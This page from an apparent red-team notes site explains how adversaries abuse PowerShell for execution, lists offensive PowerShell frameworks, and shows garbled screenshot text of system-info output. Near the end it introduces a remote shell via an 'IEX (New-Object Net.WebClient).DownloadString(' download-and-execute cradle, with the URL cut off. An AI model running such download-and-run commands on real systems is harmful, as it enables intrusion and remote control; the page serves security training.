πŸ““
πŸ““
πŸ““
πŸ““
Red Team Notes 2.0
Search…
πŸ““
πŸ““
πŸ““
πŸ““
Red Team Notes 2.0
Introduction
Red Team
Red Team Techniques
Initial Access
Execution
T1047:Windows Management Instrumentation
T1204: User Execution
T1569: Service Execution
T1053: Scheduled Tasks/Job
T1106: Native API
T1559: Inter-Process Communication
T1203: Exploitation for Client Execution
T1059: Command and Scripting Interpreter
Network Device CLI
JavaScript/JScript
Python
Visual Basic
Unix Shell
Windows Command Shell
PowerShell
Persistence
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Active Directory
Active Directory
Active Directory Attacks
Red Team Infrastructure
RED TEAM INFRASTRUCTURE
Domain Name and Categorization
Reconnaissance
Weaponization
Delivery
Situational Awareness
Credential Dumping
Persistence
Defense Evasion
Privilege Escalation
Lateral Movement
Powered By GitBook
PowerShell
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples included in the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Power Shell may be also used to download and run executables from the internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.
PowerShell commands/scripts can also be executed without directly invoke the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).
Some Examples of the PowerShell Command-Line
Whoami, hostname, PWD (Current Directory)
ComputerInfo
Windows PowerSheII PS C: Get-computerlnfo Wi ndowsBui 1 dL abEx Wi ndowscurrentversion Wi ndowsEdi ti onld Wi ndowslns tal 1 ati onType Wi ndowslns tal 1 DateF romRegi s try Wi ndowsproductld Wi ndowsp roductName Wi ndows Regi s te redo rgani zati on Wi ndows Regi s te redowner Wi ndows Sys temRoot Wi ndowsversi on Bi oscharacteri sti cs Bi os BIOSVersi on Bi osBui 1dNumber Bi oscapti on Bi oscodeset Bi osCurrentL anguage Bi os Description Bi os Embeddedcontrol 1 erMaj orVers i on Bi os Embeddedcontrol 1 e rMi norVers i on Bi osFi rmwareType Bi os Identi fi cati oncode Bi oslns tal 1 abl eL anguages Bi oslnstal 1 Date Bi os L anguageEdi ti on Bi osLis tofL anguages BiosManufacturer Bi os Name . 19041.1. amd64fre. vb . 6.3 Enterprise Client _rel ease. 191206-1406 . 11/4/2020 AM . 00329-00000-00003-AA731 Windows 10 Enterprise Adri an C: ndows . 2009 . {4, 7, 15, 16...} {VBOX Default System BIOS Default System BIOS . 110 . 111 Bios innotek GmbH Default System BIOS
What about grabbing a Remote Shell, well we will use the common IEX Command to achieve that.
Windows PowerSheII PS C: nchester.DC> IEX (New-object Net. Webclient) . Downloadstring(
Shell:
PowerShell is a powerful interface and there are many offensive tools that take advantage of its capabilities do challenge yourself to find them out in the offensive side of things.
Previous
Windows Command Shell
Next - Red Team Techniques
Persistence
Last modified 1yr ago
Copy link